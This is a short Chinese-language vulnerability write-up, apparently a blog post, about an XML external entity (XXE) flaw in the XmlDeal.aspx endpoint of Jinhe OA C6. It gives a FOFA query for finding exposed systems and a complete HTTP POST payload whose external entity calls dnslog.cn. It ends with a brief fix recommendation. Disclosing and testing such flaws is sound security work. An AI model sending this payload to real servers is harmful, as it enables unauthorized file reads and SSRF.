Babing
Published on 2024-08-30 / 0 Visits
0
0

J1-21金和-OA-XXE

J1-21金和-OA-XXE

漏洞描述:

金和OA C6 XmlDeal.aspx 接口处存在XML实体注入漏洞,攻击者可利用xxe漏洞获取服务器敏感数据,可读取任意文件以及ssrf攻击,存在一定的安全隐患。

影响版本:

  • 金和 OA

网站图片:

image.webp

网络测绘:

fofa语法:

FOFA:app=“金和网络-金和OA”

漏洞复现:

payload:

POST /c6/JHSoft.Web.Message/XmlDeal.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/Xml

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://dnslog.cn"> %remote;]>

效果图:
Dnslog验证

修复建议:

禁用金和OA C6的XmlDeal.aspx接口中的XML外部实体解析,以修复XXE漏洞并保护服务器不受敏感数据泄露和SSRF攻击的风险。


Comment